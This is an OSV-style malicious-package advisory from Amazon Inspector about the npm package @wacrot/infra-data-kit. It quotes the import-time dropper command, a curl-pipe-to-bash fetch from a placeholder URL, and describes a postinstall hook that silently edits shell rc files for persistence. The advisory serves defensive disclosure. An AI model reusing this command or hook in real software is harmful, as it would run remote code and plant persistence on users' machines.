{"id":"MAL-2026-5834","summary":"Malicious code in @wacrot/infra-data-kit (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (1568dfa61d19a63f6837c4a8c9b5d728401d0f34c87ce3550af594c141a94ac1)\nOn any `require()` or `import` of @wacrot/infra-data-kit, src/index.js invokes addSupport() at module top level, which spawns a detached `bash -c 'curl -fsSL https://example.com/script.sh | bash'` via node:child_process with stdio ignored and errors swallowed by empty catch blocks. This is a textbook fetch-and-execute dropper embedded in a package advertised as a GeoJSON / data utility, and it fires automatically on import with no user consent or verification. Separately, package.json declares a postinstall hook (`npx no-install @wacrot/infra-data-kit npm run scripts/setup.js`) which executes scripts/setup.js at install time. setup.js locates the first of ~/.zshrc, ~/.bashrc, ~/.profile, makes a.bak copy, and inserts a new line into the file. The current inserted line is benign (`export MY_CUSTOM_VAR='test'`), but the primitive is silent, persistent modification of the installer's shell rc files on every install — the standard mechanism for attacker persistence via PATH/alias/source hooks. The atypical postinstall invocation through `npx no-install` further obscures lifecycle inspection. The destination URL `https://example.com/script.sh` is a placeholder; the mechanism is fully wired and any future republish or DNS pivot delivers attacker-controlled shell code to every installer.\n","modified":"2026-06-15T21:46:53.748829439Z","published":"2026-06-15T20:55:15Z","database_specific":{"malicious-packages-origins":[{"modified_time":"2026-06-15T20:55:22Z","sha256":"1568dfa61d19a63f6837c4a8c9b5d728401d0f34c87ce3550af594c141a94ac1","import_time":"2026-06-15T21:33:35.207481775Z","source":"amazon-inspector","id":"IN-MAL-2026-006715","versions":["2.1.0"]},{"versions":["2.0.6"],"import_time":"2026-06-15T21:33:35.316809388Z","sha256":"9b786922d30a4bf2895ccc72832e755017c2a6086b60a41546477353cad7a002","id":"IN-MAL-2026-006716","source":"amazon-inspector","modified_time":"2026-06-15T20:55:23Z"},{"versions":["2.1.4"],"sha256":"ed3dbc1e873b9aeef4db7a0118d43e32ef55ba4f0bdbe60601f26dfb9f9465df","import_time":"2026-06-15T21:33:34.807092723Z","source":"amazon-inspector","id":"IN-MAL-2026-006711","modified_time":"2026-06-15T20:55:15Z"},{"versions":["2.0.9"],"import_time":"2026-06-15T21:33:35.480808304Z","sha256":"2fae648a1c4f2f52a58e92d0877909d0c257de08ac85648b26c05cfaeed735c4","id":"IN-MAL-2026-006718","source":"amazon-inspector","modified_time":"2026-06-15T20:55:25Z"},{"modified_time":"2026-06-15T20:55:20Z","sha256":"48b21f9afd4984fc6e40d4d6d9d22118936bbbda62480fceb51e2a1e05d7f2fe","import_time":"2026-06-15T21:33:35.017855228Z","source":"amazon-inspector","id":"IN-MAL-2026-006713","versions":["2.0.8"]},{"versions":["2.0.7"],"sha256":"5a287471a6a92d725824819ebe06e1f705cbce4f1a67443be50872c034e4eb6e","import_time":"2026-06-15T21:33:35.394317825Z","id":"IN-MAL-2026-006717","source":"amazon-inspector","modified_time":"2026-06-15T20:55:23Z"},{"versions":["2.1.1"],"sha256":"6dffaaac09416f6badd0af76a7fd930025004f4d7eed785c4cb8d275a55287cc","import_time":"2026-06-15T21:33:35.116906903Z","id":"IN-MAL-2026-006714","source":"amazon-inspector","modified_time":"2026-06-15T20:55:21Z"},{"modified_time":"2026-06-15T20:55:20Z","sha256":"7ef0c37effa4d55594ab9723da3aa953b0a6826726083f7ae264d913389e36ed","import_time":"2026-06-15T21:33:34.909205154Z","source":"amazon-inspector","id":"IN-MAL-2026-006712","versions":["2.1.2"]}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@wacrot/infra-data-kit/v/2.1.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@wacrot/infra-data-kit/v/2.0.6"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@wacrot/infra-data-kit/v/2.1.4"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@wacrot/infra-data-kit/v/2.0.9"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@wacrot/infra-data-kit/v/2.0.8"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@wacrot/infra-data-kit/v/2.0.7"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@wacrot/infra-data-kit/v/2.1.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@wacrot/infra-data-kit/v/2.1.2"}],"affected":[{"package":{"name":"@wacrot/infra-data-kit","ecosystem":"npm","purl":"pkg:npm/%40wacrot%2Finfra-data-kit"},"versions":["2.1.0","2.0.6","2.1.4","2.0.9","2.0.8","2.0.7","2.1.1","2.1.2"],"database_specific":{"indicators":{"evidence_files":[{"path":"src/index.js","sha256":"60a944d3f7a425ddd9b05ddf51d5d55cac6109402378680018cd5e2fb696ee50","tlsh":"ec22fc0e74fa6110c25b31b611abd0daba34c853250c9d51b99d87e06fd4abc9af7b8c"},{"path":"scripts/setup.js","sha256":"1bf9d290d4dcfae9500aca1025b84c41c779865830c0455aa84c06ad96f33ac6","tlsh":"263183678afd5f7705220952b34f20353c21e3923510f69099a8694d4fc4ad8c6c3aed"},{"path":"package.json","sha256":"feebb916f42e8438ea43ae30057cc0219bfd8e26a249bbcde85734dd0d231a46","tlsh":"94017b26ee309d2345d865521da92203a761a8870b88fc1937c7402c8f4e77f21fe76e"}],"package_integrity":[{"filename":"infra-data-kit-2.1.0.tgz","hashes":{"sha1":"4188fe2d34ce05ed66bd83483f73de3c86a8a8a0","sha512_sri":"sha512-XpeWsnqqKxb4Jxvfw11PuN92GKvEtjZSGpdnuUiQIAjO93pGQd+mGz6wuXjC8sifpmPzPxhmPrTb4jj4LL7WKw=="}}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@wacrot/infra-data-kit/MAL-2026-5834.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}